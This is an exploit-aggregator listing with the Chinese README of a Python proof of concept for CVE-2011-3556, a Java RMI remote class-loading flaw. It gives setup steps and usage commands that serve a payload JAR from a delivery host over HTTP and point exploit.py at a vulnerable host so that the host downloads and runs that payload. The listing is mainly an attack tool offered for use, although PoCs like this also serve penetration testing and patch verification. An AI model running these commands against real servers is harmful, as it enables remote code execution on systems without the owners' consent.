Sploitus

Exploit for cve_2011_3556

kitploit · 2026-08-25

Exploit Code

MARKDOWN36 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SK4LA-CVE_2011_3556
# CVE-2011-3556 — 概念验证 (PoC)

## 免责声明

此工具是现有Metasploit框架中由mihi开发的概念验证 (PoC)的Python 3实现。

## 先决条件

使用此模块只需按照以下说明操作:

root@kitploit:~
    
    
    # 将该仓库克隆到本地。
    $ git clone https://github.com/sk4la/cve_2011_3556.git && cd cve_2011_3556/
    
    # 可选地设置`x`位以能够直接执行脚本。
    $ chmod u+x exploit.py
    
    $ ./exploit.py --help && echo "It works!"
    

## 用法

### 命令行

为了被易受攻击的Java RMI服务器远程加载,有效载荷(一个JAR二进制文件)必须作为HTTP资源提供。可以使用著名的`python3 -m http.server`快速提供。

一旦有效载荷可供下载,只需执行`exploit.py`脚本即可触发漏洞。

root@kitploit:~
    
    
    $ python3 -m http.server --bind DELIVERY_HOST DELIVERY_PORT &
    $ ./exploit.py -h VULNERABLE_HOST -u http://DELIVERY_HOST:DELIVERY_PORT/PAYLOAD.jar`